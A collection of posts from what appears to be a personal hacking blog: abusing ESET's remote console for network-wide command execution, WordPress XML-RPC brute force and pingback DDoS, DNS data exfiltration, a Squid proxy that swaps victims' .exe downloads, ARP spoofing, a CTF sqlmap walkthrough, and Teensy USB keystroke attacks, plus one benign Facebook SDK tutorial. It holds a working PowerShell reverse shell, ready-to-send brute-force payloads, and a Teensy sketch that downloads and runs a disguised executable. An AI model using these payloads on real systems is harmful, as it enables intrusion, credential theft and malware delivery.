This is how i hacked into your corporate network using your own anti virus agent

Recently i was busy with one of my client project,which is a fully penetration testing assignment against his company.after the external pentest, I’ve moved into internal pentest.the company itself has Microsoft windows environment with active directory configured and they have been using eset endpoint as their anti virus.after few hours i was able to break into one of the server using very popular exploit ms17-***.

After few minutes i found clear text passwords which they had saved in a web browser and i managed to decrypt all the passwords and moved into lateral movements. Then i found ESET admin console passwords are along with them 😀 so i logged into admin console and i saw most of the computers are connected to the ESET endpoint.

Connected PCs

So i came up with this amazing idea,which is what if i can perform RCE against every connected device so i can get a shell from each of them. So i did some research and i found that ESET has a feature called Run Command Task[1], According to ESET documentation its mentioned that Run Command task can be used to execute specific command line instructions on the client.  and most important thing is it executes the commands with NT AUTHORITY\SYSTEM Privilege.  so after i found this i was able to get into active directory servers and dumped  the hashes and compromised entire network.

Then i reported about this issue to eset security team and i got this Reply from ESET Security Team: we do not consider this as vulnerability – it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple – BAT script is created with user defined content and launched.
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network.

according to ESET security team looks like they don’t care about this issue very much, well but i have to say the impact is huge. if an attacker able to recovered the password of ERA server it’s gives full privilege to an attacker over the network. and finally to the sys admins never store your password plain text or in a web browser.  always make sure to use secure password store mechanisms.

POC

 

1. Go to https://server_ip/era/webconsole/#id=CLIENTS
2. Right click on any connected devices, that you want to do the RCE
3. Click New Task, and fill up the basic info, such as task name and select Task to Run command. and then select settings tab and type the command you want to execute.and then click finish
   1. 
   2. 
   3. 
4. Then again select your target and click run task. and select your previous defined task, then select Trigger tab and make sure set trigger type As soon as possible. then click finish
   1. 
5. Game over !

PowerShell Reverse Shell Payload[2]

1. powershell –nop –exec bypass –c “$client = New-Object System.Net.Sockets.TCPClient(”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()“
2. nc -lvp 443

Timeline:

Oct 10,2018: Initial discover

Jan 10,2019: Report submitted to security@eset.com

Jan 14,2019:Requested an update on the case

Jan 23,2019:Requested an update on the case

Apr 11,2019:Another report submitted to security@eset.com with POC and write up

Apr 22,2019:Requested an update on the case

May 5,2019: Requested more information and details on case

May 6,2019: found out its a feature of ESET AV

Reply from ESET Security Team:we do not consider this as vulnerability – it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple – BAT script is created with user defined content and launched.
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network.

June 10,2019:Released  POC to public

June 11,2019: Released Blog post

Reference

[1]https://help.eset.com/esmc_admin/70/en-US/client_tasks_run_command.html

[2]https://gist.github.com/ohpe/bdd9d4385f8e6df26c02448f1bcc7a25

Exploiting WordPress XMLRPC

Recently i was playing with one of my client project which is a WordPress site.then i’ve seen interesting path that burp suite caught which is something like this

https://site.com/xmlrpc.php

then eventually i googled and did some research about wordpress xmlrpc, and its says

XML-RPC on WordPress is actually an API or “application program interface“. It gives developers who make mobile apps, desktop apps and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface

and its enable performs following operations such as

1. Publish a post
2. Edit a post
3. Delete a post.
4. Upload a new file (e.g. an image for a post)
5. Get a list of comments
6. Edit comments

Exploiting XML RPC

1.Brute force attacks

When looking into the above mentioned APIs calls; it’s required a user authentication to perform successful operation. In order to obtain the user credentials, we can perform brute force attack against the user accounts. And the most important thing is most of the security plugins hide WordPress login page and add captcha when users are unable to provide correct credentials more than 3 times, but using XMLRPC we can bypass all these and perform attacks. Before we move into that we should check whether XMLRPC is enabled or not in the target website, to check that we need to send following GET request to WordPress site

 https://site.com/xmlrpc.php 

in this example I’m using burp suite to intercept and send requests.

If XMLRPC is enabled, server returns something like this “XML-RPC server accepts POST requests only.”

Now let’s check what API functions that we can actually access. To do that we need to send a POST request to xmlrpc with following body:

 
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
 

As you can see it returns us a response with available list of functions that we can access.

There are several functions that we can use to do brute force attacks, but we are going to focus on few functions that are good and fast. such as

1. system.multicall
2. wp.UploadFile
3. wp.getUsersBlogs

Lets try wp.getUsersBlogs function

 
Request Type:POST
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>

As you can see if user name and/or password is incorrect it returns the error message by saying “incorrect username or password”

Else you can see a nice response depicted above. If brute forced user is an admin, it returns the value isAdmin with numeric value 1

The Second function is “system.multicall”  which is a special one because we can try out high number of combinations with a single request(Amplification Brute force attack). for example if we try out 20 combinations of user name and passwords with  wp.getUsersBlogs its send 20 request to server, but with multicall we can do it with single request.lets see how to do it.

 

<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>admin</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>admin1</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>

<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>admin3</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>

</data></array></value>
</param>
</params>
</methodCall>

In the above code we tried out 4 combinations with single request.

Now let’s try wp.uploadFile function. This is my favorite method, because a lot of sites allow this by default and always works.

 
Request Type:POST
xml version='1.0' encoding='utf-8'?>
<methodCall>
	<methodName>wp.uploadFile</methodName>
	<params>
		<param><value><string>1</string></value></param>
		<param><value><string>test</string></value></param>
		<param><value><string>test</string></value></param>
		<param>
			<value>
				<struct>
					<member>
						<name>name</name>
						<value><string>file.jpg</string></value>
					</member>
					<member>
						<name>type</name>
						<value><string>mime/type</string></value>
					</member>
					<member>
						<name>bits</name>
						<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
					</member>
				</struct>
			</value>
		</param>
	</params>
</methodCall>

if the username and password is not correct its return incorrect password message in return like every other function,else its return the response like this

 
HTTP/1.1 200 OK
Date:  
Server: Apache/2.4.18 ( 
Connection: close
Vary: Accept-Encoding
Content-Length: 507
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>500</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string>Could not write file file.jpg (Unable to create directory wp-content/uploads/2018/01. Is its parent directory writable by the server?).</string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

Now let’s Combine multicall and wp.UploadFile function and try it out.

 

<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.uploadFile</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>1</string></value>
<value><string>admin</string></value>
<value><string>password</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>

<value><struct>
<member>
<name>methodName</name>
<value><string>wp.uploadFile</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>1</string></value>
<value><string>admin2</string></value>
<value><string>test123</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
 
</data></array></value>
</param>
</params>
</methodCall>

Response

 
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><struct>
  <member><name>faultCode</name><value><int>500</int></value></member>
  <member><name>faultString</name><value><string>Could not write file  (Empty filename).</string></value></member>
</struct></value>
  <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>

2.DDOS Attacks

And yes using XMLRPC we can Simply ping back other servers by giving simple post Request like this.

 
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://target/</string></value></param>
        <param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
    </params>
</methodCall>

When ping Back succeed, response will look like this

Mitigation

1. https://community.rackspace.com/products/f/public-cloud-forum/6912/mitigating-xmlrpc-attacks-in-wordpress

Facebook Application Development Guide

Recently i was playing with Facebook SDK and it was pretty impressive,also it was one of my university assignment,that we had to implement an app using Oauth.The application is simple,it will grab user profile picture and basic user info and embed it to another image using PHP GD  Library [1] So i decide to write a blog post about it and some Best practices that you can use to build more secure apps.im using arch-linux all the commands are based in arch environment.

Use case

Introduction

OAuth is an open standard for authorization. It works with HTTP.

The key benefit to you is that you can allow access to your data on a site like Facebook without directly disclosing your username/password. OAuth facilitates the process by providing access while still protecting your data to some degree.

Prerequisite

1. PHP/Apache
2. composer
3. PHP GD Library
4. Facebook PHP SDK
5. template image to manipulate
6. Basic PHP Knowledge

Google is your friend 😉

Getting Started

First go to https://developers.facebook.com/ and add a new app

Type your app name

in dashboard Go to Settings and In App Domain name field,enter your domain name of server.since we are developing it in localhost,i left as it localhost

 

Go to App Review tab and turn on the Make MyApp public button to On.also click start submission button for request special permission such as user_posts,publish_actions if you need to call update status APIs 

1. 1. Go to your root folder of the web server and open terminal in there and run the below command
      1. composer require facebook/graph-sdk
      2. After that you will be able to see a folder call vendor
   2. Create two files call login.php and callback.php. In login.php file we auth the user with facebook servers. in callback.php we pass the access token of user and grab the user details from facebook servers
   3. open login.php from your favorite text editor and paste below codes

      1. 	<?php
         	if (!session_id()) {
         	session_start();
         	}
         	ini_set('display_errors', 1);
         	error_reporting(~0);
         	// Include the autoloader provided in the SDK
         	require_once __DIR__ . '/vendor/facebook/graph-sdk/src/Facebook/autoload.php';
         	$fb = new Facebook\Facebook([
         	'app_id' => '{app-id} ', // Replace {app-id} with your app id
         	'app_secret' => '{app_secret}',// Replace {app_secret} with your app id
         	'default_graph_version' => 'v2.2',
         	]);
         	$helper = $fb->getRedirectLoginHelper();
         	$permissions = ['email']; // Optional permissions
         	$loginUrl = $helper->getLoginUrl('http://localhost/callback.php&#39;, $permissions);
         	echo '<a href="' . htmlspecialchars($loginUrl) . '">Log in with Facebook!</a>';
         	?>

         view raw login.php hosted with ❤ by GitHub
      2. here $permissions = [‘email‘]; // Optional permissions you have to define Permissions[2] by Default we can access user’s public info such as name,gender,picture etc. but imagine you need to post something to user’s feed you have to define it in $permissions array $permissions=[’email’,’user_posts’]
   4. in callback.php paste below codes

      1. 	<?php
         	if(!session_id()) {
         	session_start();
         	}
         	ini_set('display_errors', 1);
         	error_reporting(~0);
         	require_once __DIR__ . '/vendor/facebook/graph-sdk/src/Facebook/autoload.php';
         	$fb = new Facebook\Facebook([
         	'app_id' => '{app-id}', // Replace {app-id} with your app id
         	'app_secret' => '{app_secret}',
         	'default_graph_version' => 'v2.2',
         	]);
         	$helper = $fb->getRedirectLoginHelper();
         	$_SESSION['FBRLH_state']=$_GET['state'];
         	try {
         	$accessToken = $helper->getAccessToken();
         	} catch(Facebook\Exceptions\FacebookResponseException $e) {
         	// When Graph returns an error
         	echo 'Graph returned an error: ' . $e->getMessage();
         	exit;
         	} catch(Facebook\Exceptions\FacebookSDKException $e) {
         	// When validation fails or other local issues
         	echo 'Facebook SDK returned an error: ' . $e->getMessage();
         	exit;
         	}
         	if (! isset($accessToken)) {
         	if ($helper->getError()) {
         	header('HTTP/1.0 401 Unauthorized');
         	echo "Error: " . $helper->getError() . "\n";
         	echo "Error Code: " . $helper->getErrorCode() . "\n";
         	echo "Error Reason: " . $helper->getErrorReason() . "\n";
         	echo "Error Description: " . $helper->getErrorDescription() . "\n";
         	} else {
         	header('HTTP/1.0 400 Bad Request');
         	echo 'Bad request';
         	}
         	exit;
         	}
         	$_SESSION['fb_access_token'] = (string) $accessToken;
         	try {
         	// Returns a `Facebook\FacebookResponse` object
         	$response = $fb->get('me?fields=picture.width(300),name', $accessToken->getValue());
         	} catch(Facebook\Exceptions\FacebookResponseException $e) {
         	echo 'Graph returned an error: ' . $e->getMessage();
         	exit;
         	} catch(Facebook\Exceptions\FacebookSDKException $e) {
         	echo 'Facebook SDK returned an error: ' . $e->getMessage();
         	exit;
         	}
         	$graphEdge = $response->getGraphNode();
         	$object = $response->getGraphObject();
         	$pic = $object->asArray('height');
         	$gen=uniqid();
         	copy($pic['picture']['url'], '/srv/http/fbapp2/'.$gen.'.jpg');
         	$skills=array("","Networking","Reverse","test");
         	$jpg_image = imagecreatefromjpeg('temp2.jpg');
         	$mypro=imagecreatefromjpeg($gen.'.jpg');
         	// Allocate A Color For The Text
         	$white = imagecolorallocate($jpg_image, 255, 255, 255);
         	// Set Path to Font File
         	$font_path = '/srv/http/fbapp2/font.ttf';
         	// Print Text On Image
         	imagettftext($jpg_image, 22, 0, 230, 430, $white, $font_path, $object->getProperty('name')); //Set Facebook name into image
         	imagettftext($jpg_image, 22, 0, 235, 460, $white, $font_path, rand(1, 1000));
         	imagettftext($jpg_image, 18, 0, 240, 500, $white, $font_path, $skills[rand(1,3)]);
         	// Output and free memory
         	ob_start ();
         	// Copy and merge
         	imagecopymerge($jpg_image, $mypro, 245, 75, 0, 0, 320, 320, 75);
         	imagejpeg ($jpg_image);
         	$image_data = ob_get_contents ();
         	ob_end_clean ();
         	$image_data_base64 = base64_encode ($image_data);
         	// Send Image to Browser
         	echo "<img src='data:image/jpeg;base64,$image_data_base64'>";
         	// Clear Memory
         	imagedestroy($jpg_image);
         	?>

         view raw callback.php hosted with ❤ by GitHub

And here is the final result 😀

Making The App More Secure

To prevent your apps from getting session hijacking attacks,facebook provides you more secure way to pass session and tokens by enabling app secret proof[3] .

to Enable app secret proof

1. In the column on the left click on Settings.
2. Click on the Advanced tab
3. Scroll down to the Security section.
4. Find the toggle for App Secret Proof for Server API calls and click it to enable it.

$secure_var= hash_hmac(‘sha256’, ‘{access-token}’, ‘{app-secret}’);

https://graph.facebook.com/v2.1/me?access_token=my-token
&appsecret_proof=secure_var

 

Project files Download

Reference

[1] https://secure.php.net/manual/en/intro.image.php

[2]https://developers.facebook.com/docs/facebook-login/permissions

[3]https://developers.facebook.com/docs/graph-api/securing-requests

Data Exfiltration Over DNS

What is it?

 

Bad guys are using various methods to exfiltration data from organization or any target.basiclly they need to exfiltration data without being detected.most of organizations use firewalls and IDS to secure their network but allowing DNS(incoming/outgoing) 😀 so over the dns we can transfers files and other important stuff 😉 here i wrote a simple C# script to demonstrate the attack.For Educational Purposes Only

How does it work?

The idea is simple, the script will encode your data and split it into small parts and make nslookup requests to a remote server, then parse the logs on the remote server and decode the file.

Prerequisite

• Linux box with DNS a server
  • also you need to enable dns query logging 🙂
• DnsExfiltration Script

this is how my configatution files looks like

	cat named.conf
	include "/etc/bind/named.conf.options";
	include "/etc/bind/named.conf.local";
	include "/etc/bind/named.conf.default-zones";
	logging{
	channel querylog{
	file "/var/log/qrlog";
	print-category yes;
	print-time yes;
	};
	category queries{ querylog;};
	};
	cat db.steal.info
	$TTL 86400
	@ IN SOA steal.info. root.localhost. (
	1 ; Serial
	604800 ; Refresh
	86400 ; Retry
	2419200 ; Expire
	86400 ) ; Negative Cache TTL
	;
	@ IN NS localhost.
	IN A 10.0.0.1
	};
	cat named.conf.local
	zone "steal.info"{
	type master;
	file "/etc/bind/db.steal.info";
	};

view raw bindconfig hosted with ❤ by GitHub

Getting started

1. Download and edit DnsExfiltration Script
   1. static String Domain = “YOUR-DOMAIN-NAME”;  //add your bind domain
   2. static String NSserver = “YOUR-NAME-SERVER”;//add your dns server ip address
   3. Call ConvertInto64(string FileTosteal,string PathTosaveEncodedFile) function in main method
   4. call SendFile(string PathTosaveEncodedFile)
2. in linux box open terminal and run this command to Reassemble the file
   1. egrep -o “[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME” /var/log/qrlog | cut -d . -f1 | uniq | awk ‘!a[$0]++’ > /pathToSave/file.bin
   2. base64 -d file.bin > decoded.jpg
   3. Done!

Demo Video

i tested this script with following file types and its working 🙂

• jpg 1Mb
• mp3 3MB
• exe 1MB

Happy Hacking!

Reference

https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664

Weaponizing the Squid proxy

 

Hey there,i recently played with squid proxy and I’ve got some cool idea to do some evil things with squid.hope you all know about squid,else the definition attached down there.after you read this post think twice before you using a public proxy 😀

What is squid

Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, from speeding up a web server by caching repeated requests; to caching web, DNS and other computer network lookups for a group of people sharing network resources, to aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including TLS, SSL, Internet Gopher and HTTPS.^[3] Squid does not support the SOCKS protocol.

basically my idea is perform a Man in the Middle attack with squid proxy.there are lot of ways to perform MITM attacks.but this one is little bit catchy and easy to setup.all we have to do is forward victim traffic into our proxy server.in local network we can do ARP spoof to do that.in public network we can act as good proxy server,which means we can publish our proxy server to some sites like proxynova[dot]com and wait until someone using it

There is more to Man in the Middle attacks than just getting  emails,passwords,cookies etc.i’ve written a  basic python url modification script that replace all (non https)windows executable files(.exe)  :3 in this example im using putty as my malicious exe

victim <><>bad squid<><>internet

Things we need

• Squid
• python
• text editor
• linux box
• executable file to replace

Commands

sudo apt-get install squid #install squid
sudo gedit  /etc/squid3/squid.conf #edit squid config file

#remember to add ACL(in my case i added my home network)
#if you dont know what your doing, just Google "squid proxy config"
acl home_network src 192.168.1.0/24
http_access allow home_network

#download squid_py.py from https://gist.github.com/Angelo99/934c6b0f6436659d836310a321279b68 and save it as in /etc/squid/squid_py.py
redirect_program /usr/bin/python /etc/squid/squid_py.py #add these lines end of config file and save it
redirect_children 5

#now restart squid
sudo service  squid3 restart

Downloads

• squid_py.py

Source Code

#!/usr/bin/env python
 
import sys
def modify_url(line):
    list = line.split(' ')
    old_url = list[0]
    new_url = '\n'
    if old_url.endswith('.exe'):
    #in this example im using putty to replace all exe(s) files in proxy level  
        new_url = 'http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe' + new_url
    return new_url
 
while True:
   
    line = sys.stdin.readline().strip()
    new_url = modify_url(line)
    sys.stdout.write(new_url)
sys.stdout.flush()

here some tips use your imagination play with JS files ;)  

References

https://en.wikipedia.org/wiki/Squid_(software)
https://gofedora.com/how-to-write-custom-redirector-rewritor-plugin-squid-python/

happy hacking!!

ARP Spoofing with ArpyKitty

Hey guys,i just wrote arp spoof tool using python and scapy.its really simple.i hope all you guys know about arp spoof,so im not gonna write any arp spoofing tutorial here.

tested in Python 2.7.6

run as sudo python ArpyKitty.py

usage: ArpyKitty.py [-h] –interface INTERFACE –gatewayIP GATEWAYIP –targetIP
TARGETIP
ArpyKitty.py: error: argument –interface is required

Ex:sudo python ArpyKitty.py –interface eth0 –gatewayIP 192.168.1.1 –targetIP 192.168.1.103

hate iptables? dont worry  here some solution to allow anything 🙂

#!/bin/sh
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Download ArpyKitty

 

happy hacking!

Hack Me If You Can CTF 2016-SLIIT

Hack me if you can CTF is an event that organized by SLIIT Cyber Security students, We team Agathon won Gold award this year and last year.this CTF was jeopardy style one and it contained  5 CTF boxes

1. Boot2root
2. Hack Edu
3. Prankster
4. root2Linux
5. Catch the Droid

within 8 Hours Teams must break these 5 boxes.

here b2r,

Level 1: exploit vulnerable

Level 2:Basic Decoding

Level 3:Analytical skills

Level 4:Basic Crypto

Level 5:Stego(but you can bypass this one)

Boot2Root

#Commands
nmap -sP 192.168.1.0/24
nmap -vv 192.168.1.107
sqlmap -u "http://192.168.1.107/page.php?id=2" --dbs
sqlmap -u "http://192.168.1.107/page.php?id=2" --tables -D ctf
sqlmap -u "http://192.168.1.107/page.php?id=2" -T users -D ctf --columns
sqlmap -u "http://192.168.1.107/page.php?id=2" -T users -D ctf --dump
java -jar DirBuster-0.12.jar
ssh user1@192.168.1.107
ssh user2@192.168.1.107
ssh user3@192.168.1.107
ssh user4@192.168.1.107

i’ll write about root2Linux and Prankster later.

 

Plug And Hack With Teensy

Hey there,

This is my first post about Teensy attacks.Teensy exploiting is an old method but still useful.i decide to write about Teensy attacks.this types of attacks possible with little bit Social engineering, its take only 10 sec to pwn a PC

What is Teensy?

Basically its a Programmable HID

A human interface device or HID is a type of computer device that interacts directly with, and most often takes input from, humans and may deliver output to humans.

Interesting things About Teensy

1. As i mention above Teensy is a HID,so when we plug it Computer take it as a Keyboard so Anti Virus products Cant Detect it and We can Program it
2. Works even if autorun is turned off.
3. we can send keys to an active window
4. We can perform Download and execute,Add RDP user,add domain user,drop trojans etc.. by just plugging teensy into the target 😀

Prerequisites Knowledge

1. Basic Arduino
2. Basic C Programming

Getting Started

1. You need to Buy a Teensy USB from PJRC there are different teensy versions available now.currently im using Teensy 2.0
2. if your planning to carry big payloads you must buy a teensy SD Adaptor else you can use inbuilt memory,but it cant carry heavy payloads
3. Download Arduino 1.6.9 IDE
4. Download Teensyduino(Teensy Loader)
5. Download PHUKD library
6. Download Example scripts

Make sure to download Arduino 1.6.9 and extract PHUKD library files to Arduino library files folder.after that open Arduino IDE and go to Tools Select Board to Teensy 2.0 And USB type to Disk(internal)+keyboard

 

 

 

 

 

 

 

 

 

 

Let’s Hack it

open Arduino IDE and Paste below code,click verify and Upload to test our first script.once it is Uploaded reject teensy and plug it again.then you can see teensy automatically will open notepad and print Keyboard.print() Message in notepad.

#include <phukdlib.h>
void setup() {
  delay(3000);
  CommandAtRunBarMSWIN("notepad.exe");
  delay(2000);
  Keyboard.print("https://h3llwings.wordpress.com @angelowin32 ;)");
  
}
void loop(){}

Now lets do something useful.in Windows we can use powershell to do our dirty works.we can use powershell to download and execute our malware in target PC

//Download Putty and Excute
//https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
//Angelo Ruwantha
#include <phukdlib.h>
void setup() {
  delay(3000); //sleep 3 sec
  CommandAtRunBarMSWIN("powershell.exe"); //send keys win+R then type powershell.exe
  delay(2000);//sleep 2 sec
  Keyboard.print("$down = New-Object System.Net.WebClient; $url = 'https://the.earth.li/~sgtatham/putty/latest/x86/puttygen.exe'; $file = 'win_update.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;");//Download file and excute
  delay(2000);
  Keyboard.set_key1(KEY_ENTER); //send keys Enter
  Keyboard.send_now();    
  Keyboard.set_key1(0);//send keys 0 to stop looping
  Keyboard.send_now();  
}
void loop(){}

phukdlib library functions

//phukdlib functions

CommandAtRunBarMSWIN(char *SomeCommand); //Opens the run bar and executes the command.

CommandAtRunBarGnome(char *SomeCommand);
CommandAtRunBarOSX(char *SomeCommand);//OSX Opens spotlight and executes the command
CommandAtNewTerminal(char *SomeCommand);
ShrinkCurWinOSX();
ShrinkCurWin();//Shrinks the active window to help hide it.
ShrinkCurWinMSWIN();
ShrinkCurWinGnome();
PressAndRelease(int KeyCode,int KeyCount);
ShowDiag();
int ledkeys(); //ledkeys returns the setting of the "lock keys"
boolean IsNumbOn(void);
boolean IsCapsOn(void);
boolean IsScrlOn(void);

How to prvent from these types of attacks?

1. Don’t plug unknown USB devices
2. Close your USB ports
3. Lock your server rooms 😀

Currently im writing my own framework for teensy to perform  advanced attacks.

btw there are some popular teensy attacks frameworks available  you guys should play with these frameworks its really amazing 🙂

The Social Engineering Framework

Peensy

kautilya

References

http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload—Windows-10-:-Download-and-execute-file-with-Powershell

https://en.wikipedia.org/wiki/Human_interface_device